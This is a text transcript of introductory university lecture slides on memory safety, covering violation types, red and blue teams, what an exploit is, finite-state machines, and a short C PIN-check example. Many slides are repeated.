system security 1 - memory safety - information security€¦ · memory safety is a concern in...
TRANSCRIPT
![Page 1: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/1.jpg)
System Security 1 - Memory Safety
Information Security
Michael Schwarz
November 8, 2019
www.iaik.tugraz.at
![Page 2: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/2.jpg)
Memory Safety www.tugraz.at
Memory safety - Wikipedia
Memory safety is a concern in software development
that aims to avoid software bugs
that cause security vulnerabilities dealing with random-access memory (RAM) access,
such as buffer overflows and dangling pointers.
1 Michael Schwarz — www.iaik.tugraz.at
![Page 3: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/3.jpg)
Memory Safety www.tugraz.at
Memory safety - Wikipedia
Memory safety is a concern in software development that aims to avoid software bugs
that cause security vulnerabilities
dealing with random-access memory (RAM) access,
such as buffer overflows and dangling pointers.
1 Michael Schwarz — www.iaik.tugraz.at
![Page 4: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/4.jpg)
Memory Safety www.tugraz.at
Memory safety - Wikipedia
Memory safety is a concern in software development that aims to avoid software bugs
that cause security vulnerabilities dealing with random-access memory (RAM) access,
such as buffer overflows and dangling pointers.
1 Michael Schwarz — www.iaik.tugraz.at
![Page 5: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/5.jpg)
Memory Safety www.tugraz.at
Memory safety - Wikipedia
Memory safety is a concern in software development that aims to avoid software bugs
that cause security vulnerabilities dealing with random-access memory (RAM) access,
such as buffer overflows and dangling pointers.
1 Michael Schwarz — www.iaik.tugraz.at
![Page 6: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/6.jpg)
Memory Safety - More Details www.tugraz.at
A program execution is memory safe if the following things do not occur:
• Access errors
• Buffer overflow/over-read
• Invalid pointer
• Race condition
• Use after free
• Uninitialized variables
• Null pointer access
• Uninitialized pointer access
• Memory leaks
• Stack/heap overflow
• Invalid free
• Unwanted aliasing
2 Michael Schwarz — www.iaik.tugraz.at
![Page 7: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/7.jpg)
Memory Safety - More Details www.tugraz.at
A program execution is memory safe if the following things do not occur:
• Access errors
• Buffer overflow/over-read
• Invalid pointer
• Race condition
• Use after free
• Uninitialized variables
• Null pointer access
• Uninitialized pointer access
• Memory leaks
• Stack/heap overflow
• Invalid free
• Unwanted aliasing
2 Michael Schwarz — www.iaik.tugraz.at
![Page 8: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/8.jpg)
Memory Safety - More Details www.tugraz.at
A program execution is memory safe if the following things do not occur:
• Access errors
• Buffer overflow/over-read
• Invalid pointer
• Race condition
• Use after free
• Uninitialized variables
• Null pointer access
• Uninitialized pointer access
• Memory leaks
• Stack/heap overflow
• Invalid free
• Unwanted aliasing
2 Michael Schwarz — www.iaik.tugraz.at
![Page 9: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/9.jpg)
Memory Safety - More Details www.tugraz.at
A program execution is memory safe if the following things do not occur:
• Access errors
• Buffer overflow/over-read
• Invalid pointer
• Race condition
• Use after free
• Uninitialized variables
• Null pointer access
• Uninitialized pointer access
• Memory leaks
• Stack/heap overflow
• Invalid free
• Unwanted aliasing
2 Michael Schwarz — www.iaik.tugraz.at
![Page 10: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/10.jpg)
Memory Safety - More Details www.tugraz.at
A program execution is memory safe if the following things do not occur:
• Access errors
• Buffer overflow/over-read
• Invalid pointer
• Race condition
• Use after free
• Uninitialized variables
• Null pointer access
• Uninitialized pointer access
• Memory leaks
• Stack/heap overflow
• Invalid free
• Unwanted aliasing
2 Michael Schwarz — www.iaik.tugraz.at
![Page 11: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/11.jpg)
Memory Safety - More Details www.tugraz.at
A program execution is memory safe if the following things do not occur:
• Access errors
• Buffer overflow/over-read
• Invalid pointer
• Race condition
• Use after free
• Uninitialized variables
• Null pointer access
• Uninitialized pointer access
• Memory leaks
• Stack/heap overflow
• Invalid free
• Unwanted aliasing
2 Michael Schwarz — www.iaik.tugraz.at
![Page 12: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/12.jpg)
Memory Safety - More Details www.tugraz.at
A program execution is memory safe if the following things do not occur:
• Access errors
• Buffer overflow/over-read
• Invalid pointer
• Race condition
• Use after free
• Uninitialized variables
• Null pointer access
• Uninitialized pointer access
• Memory leaks
• Stack/heap overflow
• Invalid free
• Unwanted aliasing
2 Michael Schwarz — www.iaik.tugraz.at
![Page 13: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/13.jpg)
Memory Safety - More Details www.tugraz.at
A program execution is memory safe if the following things do not occur:
• Access errors
• Buffer overflow/over-read
• Invalid pointer
• Race condition
• Use after free
• Uninitialized variables
• Null pointer access
• Uninitialized pointer access
• Memory leaks
• Stack/heap overflow
• Invalid free
• Unwanted aliasing
2 Michael Schwarz — www.iaik.tugraz.at
![Page 14: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/14.jpg)
Memory Safety - More Details www.tugraz.at
A program execution is memory safe if the following things do not occur:
• Access errors
• Buffer overflow/over-read
• Invalid pointer
• Race condition
• Use after free
• Uninitialized variables
• Null pointer access
• Uninitialized pointer access
• Memory leaks
• Stack/heap overflow
• Invalid free
• Unwanted aliasing
2 Michael Schwarz — www.iaik.tugraz.at
![Page 15: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/15.jpg)
Memory Safety - More Details www.tugraz.at
A program execution is memory safe if the following things do not occur:
• Access errors
• Buffer overflow/over-read
• Invalid pointer
• Race condition
• Use after free
• Uninitialized variables
• Null pointer access
• Uninitialized pointer access
• Memory leaks
• Stack/heap overflow
• Invalid free
• Unwanted aliasing
2 Michael Schwarz — www.iaik.tugraz.at
![Page 16: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/16.jpg)
Memory Safety - More Details www.tugraz.at
A program execution is memory safe if the following things do not occur:
• Access errors
• Buffer overflow/over-read
• Invalid pointer
• Race condition
• Use after free
• Uninitialized variables
• Null pointer access
• Uninitialized pointer access
• Memory leaks
• Stack/heap overflow
• Invalid free
• Unwanted aliasing
2 Michael Schwarz — www.iaik.tugraz.at
![Page 17: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/17.jpg)
Memory Safety - More Details www.tugraz.at
A program execution is memory safe if the following things do not occur:
• Access errors
• Buffer overflow/over-read
• Invalid pointer
• Race condition
• Use after free
• Uninitialized variables
• Null pointer access
• Uninitialized pointer access
• Memory leaks
• Stack/heap overflow
• Invalid free
• Unwanted aliasing
2 Michael Schwarz — www.iaik.tugraz.at
![Page 18: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/18.jpg)
Memory Safety - More Details www.tugraz.at
A program execution is memory safe if the following things do not occur:
• Access errors
• Buffer overflow/over-read
• Invalid pointer
• Race condition
• Use after free
• Uninitialized variables
• Null pointer access
• Uninitialized pointer access
• Memory leaks
• Stack/heap overflow
• Invalid free
• Unwanted aliasing
2 Michael Schwarz — www.iaik.tugraz.at
![Page 19: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/19.jpg)
Memory Safety Violation www.tugraz.at
Two types of memory safety violation
Spatial violation: memory access is out of object’s bounds
• buffer overflow
• out-of-bounds reads
• null pointer dereference
Temporal violation: memory access refers to an invalid object
• use after free
• double free
• use of uninitialized memory
3 Michael Schwarz — www.iaik.tugraz.at
![Page 20: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/20.jpg)
Memory Safety Violation www.tugraz.at
Two types of memory safety violation
Spatial violation: memory access is out of object’s bounds
• buffer overflow
• out-of-bounds reads
• null pointer dereference
Temporal violation: memory access refers to an invalid object
• use after free
• double free
• use of uninitialized memory
3 Michael Schwarz — www.iaik.tugraz.at
![Page 21: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/21.jpg)
Memory Safety Violation www.tugraz.at
Two types of memory safety violation
Spatial violation: memory access is out of object’s bounds
• buffer overflow
• out-of-bounds reads
• null pointer dereference
Temporal violation: memory access refers to an invalid object
• use after free
• double free
• use of uninitialized memory
3 Michael Schwarz — www.iaik.tugraz.at
![Page 22: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/22.jpg)
Motivation www.tugraz.at
The complexer the programs, the more bugs
2002 2004 2006 2008 2010 2012 2014 2016
0
200
400
600
800
2 2 3 2191 95 128
188
342 351423
366420
749 717
Year
Mem
ory
Cor
rup
tion
Vu
lner
abili
ties
1
1Source: http://www.cvedetails.com/vulnerabilities-by-types.php
4 Michael Schwarz — www.iaik.tugraz.at
![Page 23: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/23.jpg)
Red Team vs Blue Team www.tugraz.at
• There are two views on memory safety:• Attackers try to violate memory safety
• Defenders try to ensure memory safety
• Attackers and defenders are often seen as teams in a “security war game”
• The Red Team tries to find security problems and mount attacks
• The Blue Team tries to protect software and defend against attacks
5 Michael Schwarz — www.iaik.tugraz.at
![Page 24: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/24.jpg)
Red Team vs Blue Team www.tugraz.at
• There are two views on memory safety:• Attackers try to violate memory safety
• Defenders try to ensure memory safety
• Attackers and defenders are often seen as teams in a “security war game”
• The Red Team tries to find security problems and mount attacks
• The Blue Team tries to protect software and defend against attacks
5 Michael Schwarz — www.iaik.tugraz.at
![Page 25: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/25.jpg)
Red Team vs Blue Team www.tugraz.at
• There are two views on memory safety:• Attackers try to violate memory safety
• Defenders try to ensure memory safety
• Attackers and defenders are often seen as teams in a “security war game”
• The Red Team tries to find security problems and mount attacks
• The Blue Team tries to protect software and defend against attacks
5 Michael Schwarz — www.iaik.tugraz.at
![Page 26: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/26.jpg)
Red Team vs Blue Team www.tugraz.at
• There are two views on memory safety:• Attackers try to violate memory safety
• Defenders try to ensure memory safety
• Attackers and defenders are often seen as teams in a “security war game”
• The Red Team tries to find security problems and mount attacks
• The Blue Team tries to protect software and defend against attacks
5 Michael Schwarz — www.iaik.tugraz.at
![Page 27: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/27.jpg)
Red Team vs Blue Team www.tugraz.at
• The Red Team are not (only) criminals, their work is
essential for the Blue Team
• Blue Team develops defenses based on Red Team
attacks
• Red Team breaks them again
Ñ More secure software and better defenses
• Ultimate goal: memory safe programs
6 Michael Schwarz — www.iaik.tugraz.at
![Page 28: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/28.jpg)
Red Team vs Blue Team www.tugraz.at
• The Red Team are not (only) criminals, their work is
essential for the Blue Team
• Blue Team develops defenses based on Red Team
attacks
• Red Team breaks them again
Ñ More secure software and better defenses
• Ultimate goal: memory safe programs
6 Michael Schwarz — www.iaik.tugraz.at
![Page 29: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/29.jpg)
Red Team vs Blue Team www.tugraz.at
• The Red Team are not (only) criminals, their work is
essential for the Blue Team
• Blue Team develops defenses based on Red Team
attacks
• Red Team breaks them again
Ñ More secure software and better defenses
• Ultimate goal: memory safe programs
6 Michael Schwarz — www.iaik.tugraz.at
![Page 30: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/30.jpg)
Red Team vs Blue Team www.tugraz.at
• The Red Team are not (only) criminals, their work is
essential for the Blue Team
• Blue Team develops defenses based on Red Team
attacks
• Red Team breaks them again
Ñ More secure software and better defenses
• Ultimate goal: memory safe programs
6 Michael Schwarz — www.iaik.tugraz.at
![Page 31: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/31.jpg)
Red Team vs Blue Team www.tugraz.at
• The Red Team are not (only) criminals, their work is
essential for the Blue Team
• Blue Team develops defenses based on Red Team
attacks
• Red Team breaks them again
Ñ More secure software and better defenses
• Ultimate goal: memory safe programs
6 Michael Schwarz — www.iaik.tugraz.at
![Page 32: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/32.jpg)
Red Team aka Attacks
Attacks
![Page 33: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/33.jpg)
What is an Exploit? www.tugraz.at
• What is an exploit?
• “a software tool designed to take advantage of a flaw in a
computer system” (Oxford)
• “[...] cause unintended or unanticipated behavior to occur on
computer software” (Wikipedia)
• “If Achilless heel was his vulnerability in the Iliad, then Pariss
poison tipped arrow was the exploit. ” (Kaspersky)
Ñ Quite fuzzy
7 Michael Schwarz — www.iaik.tugraz.at
![Page 34: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/34.jpg)
What is an Exploit? www.tugraz.at
• What is an exploit?
• “a software tool designed to take advantage of a flaw in a
computer system” (Oxford)
• “[...] cause unintended or unanticipated behavior to occur on
computer software” (Wikipedia)
• “If Achilless heel was his vulnerability in the Iliad, then Pariss
poison tipped arrow was the exploit. ” (Kaspersky)
Ñ Quite fuzzy
7 Michael Schwarz — www.iaik.tugraz.at
![Page 35: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/35.jpg)
What is an Exploit? www.tugraz.at
• What is an exploit?
• “a software tool designed to take advantage of a flaw in a
computer system” (Oxford)
• “[...] cause unintended or unanticipated behavior to occur on
computer software” (Wikipedia)
• “If Achilless heel was his vulnerability in the Iliad, then Pariss
poison tipped arrow was the exploit. ” (Kaspersky)
Ñ Quite fuzzy
7 Michael Schwarz — www.iaik.tugraz.at
![Page 36: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/36.jpg)
What is a “normal” program?2 www.tugraz.at
• Programs: machines solving a certain problem(?)
• Ideally, finite-state machines
• We don’t build such machines Ñ general-purpose hardware
emulating them
• Programs: emulators for finite-state machines
2Most of the following ideas are from Halvar Flake / Thomas Dullien
8 Michael Schwarz — www.iaik.tugraz.at
![Page 37: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/37.jpg)
What is a “normal” program?2 www.tugraz.at
• Programs: machines solving a certain problem(?)
• Ideally, finite-state machines
• We don’t build such machines Ñ general-purpose hardware
emulating them
• Programs: emulators for finite-state machines
2Most of the following ideas are from Halvar Flake / Thomas Dullien
8 Michael Schwarz — www.iaik.tugraz.at
![Page 38: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/38.jpg)
What is a “normal” program?2 www.tugraz.at
• Programs: machines solving a certain problem(?)
• Ideally, finite-state machines
• We don’t build such machines Ñ general-purpose hardware
emulating them
• Programs: emulators for finite-state machines
2Most of the following ideas are from Halvar Flake / Thomas Dullien
8 Michael Schwarz — www.iaik.tugraz.at
![Page 39: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/39.jpg)
What is a “normal” program?2 www.tugraz.at
• Programs: machines solving a certain problem(?)
• Ideally, finite-state machines
• We don’t build such machines Ñ general-purpose hardware
emulating them
• Programs: emulators for finite-state machines
2Most of the following ideas are from Halvar Flake / Thomas Dullien
8 Michael Schwarz — www.iaik.tugraz.at
![Page 40: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/40.jpg)
What is a “normal” program? www.tugraz.at
1
2
E:
E:
open
close
open
close
opened
closed
state
entry action
transition
transition condition
opendoor
closedoor
• Finite-state machines: states and transitions
• Input: changes state to different state
• Finite-state machine (FSM) solves your problem
• Many different ways to implement FSM
9 Michael Schwarz — www.iaik.tugraz.at
![Page 41: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/41.jpg)
What is a “normal” program? www.tugraz.at
1
2
E:
E:
open
close
open
close
opened
closed
state
entry action
transition
transition condition
opendoor
closedoor
• Finite-state machines: states and transitions
• Input: changes state to different state
• Finite-state machine (FSM) solves your problem
• Many different ways to implement FSM
9 Michael Schwarz — www.iaik.tugraz.at
![Page 42: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/42.jpg)
What is a “normal” program? www.tugraz.at
1
2
E:
E:
open
close
open
close
opened
closed
state
entry action
transition
transition condition
opendoor
closedoor
• Finite-state machines: states and transitions
• Input: changes state to different state
• Finite-state machine (FSM) solves your problem
• Many different ways to implement FSM
9 Michael Schwarz — www.iaik.tugraz.at
![Page 43: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/43.jpg)
What is a “normal” program? www.tugraz.at
1
2
E:
E:
open
close
open
close
opened
closed
state
entry action
transition
transition condition
opendoor
closedoor
• Finite-state machines: states and transitions
• Input: changes state to different state
• Finite-state machine (FSM) solves your problem
• Many different ways to implement FSM
9 Michael Schwarz — www.iaik.tugraz.at
![Page 44: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/44.jpg)
An Example: Simple Password Manager www.tugraz.at
Read PIN
correct?
Show password list
Error message
Yes
No
• Security properties for your FSM
• Security properties based on inputs and outputs
• e.g., It should be practically infeasible for an attacker to get the password list
(output) if he does not know the PIN (input)
10 Michael Schwarz — www.iaik.tugraz.at
![Page 45: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/45.jpg)
An Example: Simple Password Manager www.tugraz.at
Read PIN
correct?
Show password list
Error message
Yes
No
• Security properties for your FSM
• Security properties based on inputs and outputs
• e.g., It should be practically infeasible for an attacker to get the password list
(output) if he does not know the PIN (input)
10 Michael Schwarz — www.iaik.tugraz.at
![Page 46: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/46.jpg)
An Example: Simple Password Manager www.tugraz.at
Read PIN
correct?
Show password list
Error message
Yes
No
• Security properties for your FSM
• Security properties based on inputs and outputs
• e.g., It should be practically infeasible for an attacker to get the password list
(output) if he does not know the PIN (input)
10 Michael Schwarz — www.iaik.tugraz.at
![Page 47: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/47.jpg)
Finite-state machine states vs CPU states www.tugraz.at
• We have to write an emulator for our FSM
• CPU has a lot more states than our FSM
• Every FSM state is represented by one or more CPU states
• For example, reading the PIN requires multiple CPU states
Ñ Keyboard interrups, reading keys, storing text in memory, ...
• Not every CPU state is represented in the FSM
11 Michael Schwarz — www.iaik.tugraz.at
![Page 48: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/48.jpg)
Finite-state machine states vs CPU states www.tugraz.at
• We have to write an emulator for our FSM
• CPU has a lot more states than our FSM
• Every FSM state is represented by one or more CPU states
• For example, reading the PIN requires multiple CPU states
Ñ Keyboard interrups, reading keys, storing text in memory, ...
• Not every CPU state is represented in the FSM
11 Michael Schwarz — www.iaik.tugraz.at
![Page 49: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/49.jpg)
Finite-state machine states vs CPU states www.tugraz.at
• We have to write an emulator for our FSM
• CPU has a lot more states than our FSM
• Every FSM state is represented by one or more CPU states
• For example, reading the PIN requires multiple CPU states
Ñ Keyboard interrups, reading keys, storing text in memory, ...
• Not every CPU state is represented in the FSM
11 Michael Schwarz — www.iaik.tugraz.at
![Page 50: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/50.jpg)
Finite-state machine states vs CPU states www.tugraz.at
• We have to write an emulator for our FSM
• CPU has a lot more states than our FSM
• Every FSM state is represented by one or more CPU states
• For example, reading the PIN requires multiple CPU states
Ñ Keyboard interrups, reading keys, storing text in memory, ...
• Not every CPU state is represented in the FSM
11 Michael Schwarz — www.iaik.tugraz.at
![Page 51: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/51.jpg)
Finite-state machine states vs CPU states www.tugraz.at
• We have to write an emulator for our FSM
• CPU has a lot more states than our FSM
• Every FSM state is represented by one or more CPU states
• For example, reading the PIN requires multiple CPU states
Ñ Keyboard interrups, reading keys, storing text in memory, ...
• Not every CPU state is represented in the FSM
11 Michael Schwarz — www.iaik.tugraz.at
![Page 52: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/52.jpg)
CPU states www.tugraz.at
3 cases for CPU states
• Sane state: A CPU state corresponding to an FSM state
• Transitory state: A CPU state during a transition, leading to a
sane state
• Weird state: A CPU state which does not correspond to an
FSM state
12 Michael Schwarz — www.iaik.tugraz.at
![Page 53: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/53.jpg)
CPU states www.tugraz.at
3 cases for CPU states
• Sane state: A CPU state corresponding to an FSM state
• Transitory state: A CPU state during a transition, leading to a
sane state
• Weird state: A CPU state which does not correspond to an
FSM state
12 Michael Schwarz — www.iaik.tugraz.at
![Page 54: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/54.jpg)
CPU states www.tugraz.at
3 cases for CPU states
• Sane state: A CPU state corresponding to an FSM state
• Transitory state: A CPU state during a transition, leading to a
sane state
• Weird state: A CPU state which does not correspond to an
FSM state
12 Michael Schwarz — www.iaik.tugraz.at
![Page 55: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/55.jpg)
CPU states www.tugraz.at
3 cases for CPU states
• Sane state: A CPU state corresponding to an FSM state
• Transitory state: A CPU state during a transition, leading to a
sane state
• Weird state: A CPU state which does not correspond to an
FSM state
12 Michael Schwarz — www.iaik.tugraz.at
![Page 56: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/56.jpg)
Example continued: A Simple Password Manager www.tugraz.at
int main() {
uint32_t pin, correct = 0;
while(1) {
pin = readPIN();
if(pin * 2654435761u == 324783883u)
correct = 1;
if(correct) {
showPasswords();
break;
} else printf("\nWrong PIN!\n");
}
return 0;
}
